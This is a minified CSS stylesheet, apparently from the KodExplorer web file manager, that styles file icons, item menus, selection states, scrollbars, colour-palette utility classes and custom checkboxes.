.file-list-icon .file-select-drag-temp{transform:scale(1.1,1.1);}.file-continer .file .filename .title.db-click-rename{cursor:text;}.file-continer .file .item-menu{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;}.file-continer .file .item-menu:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-menu:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-menu .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;padding:2px;left:5px;border-radius:50%;background:rgba(0,0,0,0.05);border:none;color:#fff;}.file-continer .file .item-select:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-select:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-select .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select:hover{color:#fff;background:rgba(0,0,0,0.2);box-shadow:none;}.file-continer .file .item-select .item-check{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;font-size:12px;text-shadow:none;}.file-continer .file .item-select .item-check:after{content:"\f00c";position:relative;top:-1px;}.file-continer .file.hover .item-menu,.file-continer .file.select .item-menu,.file-continer .file.file-select-drag-temp .item-menu{display:block;}.file-continer .file.hover .item-select,.file-continer .file.select .item-select,.file-continer .file.file-select-drag-temp .item-select{display:block;}.file-continer .file.select .item-select{color:#fff;background:#3b8cff;}.file-continer.file-list-split .file .item-menu{top:3px;right:25px;}.file-continer.file-list-split .file .item-select{top:2px;right:45px;left:auto;}.file-continer.file-list-list .file .item-menu{top:4px;right:5px;}.file-continer.file-list-list .file .item-select{top:4px;right:25px;left:auto;}.file-list-icon{padding:10px 20px 0 10px;display:flex;justify-content:space-between;flex-wrap:wrap;align-items:flex-start;}.file-list-icon:after{width:82px;content:"";display:block;}.file-list-icon .flex-empty{width:75px;border:1px solid transparent;margin:0;margin-right:10px;margin-bottom:10px;visibility:hidden;height:0 !important;}.file-list-icon .meta-info{height:22.5px;width:22.5px;margin-right:6.75px;margin-top:-22.5px;position:absolute;right:0;}.file-list-icon .meta-info img{width:100%;height:100%;}.file-list-icon .file{color:#335;border:1px solid transparent;box-shadow:0px 0px 2px rgba(255,255,255,0);-webkit-transition:background 0.2s, border 0.2s, color 0.2s;-moz-transition:background 0.2s, border 0.2s, color 0.2s;-o-transition:background 0.2s, border 0.2s, color 0.2s;-ms-transition:background 0.2s, border 0.2s, color 0.2s;transition:background 0.2s, border 0.2s, color 0.2s;width:60px;height:75px;text-decoration:none;margin:0;margin-right:10px;margin-bottom:10px;overflow:hidden;float:left;}.file-list-icon .file .ico{-webkit-transition:all 0.168s;-moz-transition:all 0.168s;-o-transition:all 0.168s;-ms-transition:all 0.168s;transition:all 0.168s;}.file-list-icon .file.hover{border:1px solid #dedede;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fafafa', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fafafa,#eeeeee);background-image:-moz-linear-gradient(top,#fafafa,#eeeeee);background-image:-o-linear-gradient(top,#fafafa,#eeeeee);background-image:-ms-linear-gradient(top,#fafafa,#eeeeee);background-image:linear-gradient(top,#fafafa,#eeeeee);-pie-background:linear-gradient(to top,#fafafa,#eeeeee);border-radius:3px;}.file-list-icon .file .filename{width:60px;cursor:default;text-align:center;word-break:break-all;font-size:1.0em;margin:0 auto;line-height:1.5em;padding-bottom:5px;}.file-list-icon .file .filename .textarea{position:absolute;font-size:1.0em;text-align:center;margin-left:-1px;margin-top:-3px;}.file-list-icon .file .filename #pathRenameTextarea,.file-list-icon .file .filename .newfile{width:60px;padding:0px 0 4px 0;margin-top:0px;overflow-y:hidden;border:1px solid #888;font-size:1.0em;text-align:center;line-height:1.5em;position:absolute;z-index:999;margin-top:2px;border-bottom-left-radius:3px;border-bottom-right-radius:3px;}.file-list-icon .file .filename #pathRenameTextarea:focus,.file-list-icon .file .filename .newfile:focus{outline:none;}.file-list-icon .file.select,.file-list-icon .file.file-select-drag-temp{border:1px solid #d2d2d2;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', endColorstr='#d9d9d9');background-image:-webkit-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-moz-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-o-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:-ms-linear-gradient(top,#f3f3f3,#d9d9d9);background-image:linear-gradient(top,#f3f3f3,#d9d9d9);-pie-background:linear-gradient(to top,#f3f3f3,#d9d9d9);border-radius:3px;padding:0px;}.file-list-icon .file.file-icon-edit{overflow:visible;}.file-list-icon .file.file-icon-edit .filename{position:absolute;z-index:99;}.file-list-icon .file .ico{height:60px;width:60px;padding-top:4px;text-align:center;vertical-align:middle;display:table-cell;}.file-list-icon .file .ico img{height:100% \9;max-height:100%;max-width:100%;border-radius:5px;}.file-list-icon .file .ico.picture{background:none;width:50px;padding-left:5px;}.file-list-icon .file .ico.picture img{-webkit-box-shadow:1px 1px 5px rgba(0,0,0,0.2);-moz-box-shadow:1px 1px 5px rgba(0,0,0,0.2);box-shadow:1px 1px 5px rgba(0,0,0,0.2);width:100% \9;max-width:100%;border-radius:0px;}.file-list-icon .file .ico.picture img.lazyload-ready{-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none;}@media screen and (max-width:100000px){div.file-list-icon div.file{ display:inline-block;max-height:152px;vertical-align:top;float:none;height:auto;}}.context-menu-item.set-file-icon-size .box-size-smallx{font-size:0.9em;}.context-menu-item.set-file-icon-size .box-size-small{font-size:1.0em;}.context-menu-item.set-file-icon-size .box-size-default{font-size:1.15em;}.context-menu-item.set-file-icon-size .box-size-big{font-size:1.25em;}.context-menu-item.set-file-icon-size .box-size-bigx{font-size:1.35em;}#list-type-header{z-index:5;position:absolute;width:100%;top:85px;}#main-title{background:#fff;border-bottom:1px solid #e3e3e3;box-shadow:0 2px 10px rgba(0,0,0,0.06);}#main-title .box-shadow(1px 2px 15px #dde) +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100994.3851] */ +body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} 